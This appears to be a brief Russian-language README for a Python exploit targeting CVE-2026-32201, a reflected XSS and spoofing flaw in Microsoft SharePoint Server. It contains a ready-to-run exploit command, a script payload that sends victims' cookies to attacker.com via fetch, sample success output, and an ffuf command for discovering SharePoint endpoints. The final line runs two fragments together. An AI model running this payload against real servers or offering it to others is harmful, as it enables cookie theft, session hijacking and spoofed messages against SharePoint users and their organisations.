
Python-эксплойт для CVE-2026-32201, отражённый XSS в Microsoft SharePoint Server, позволяющий неаутентифицированный спуфинг и модификацию данных с помощью специально сформированных HTTP-запросов.
Python-эксплойт для CVE-2026-32201 — некорректная проверка входных данных в Microsoft SharePoint Server, позволяющая неаутентифицированную сетевую подмену (C:L/I:L).
python3 exploit.py https://sharepoint.target.com \
--recipient [email protected] \
--sender "[email protected]" \
--message "<script>fetch('http://attacker.com/?c='+document.cookie)</script>" \
--endpoint /_layouts/15/notify.aspx
Пример вывода:
[+] SharePoint обнаружен.
[*] Отправка поддельного запроса на https://target.com/_layouts/15/notify.aspx
[+] Статус: 200
[+] Возможный успех: проверьте журналы/почту цели на наличие поддельного содержимого.
ffuf -u https://target.com/FUZZ -w sharepoint-layouts.txt--message для кражи cookie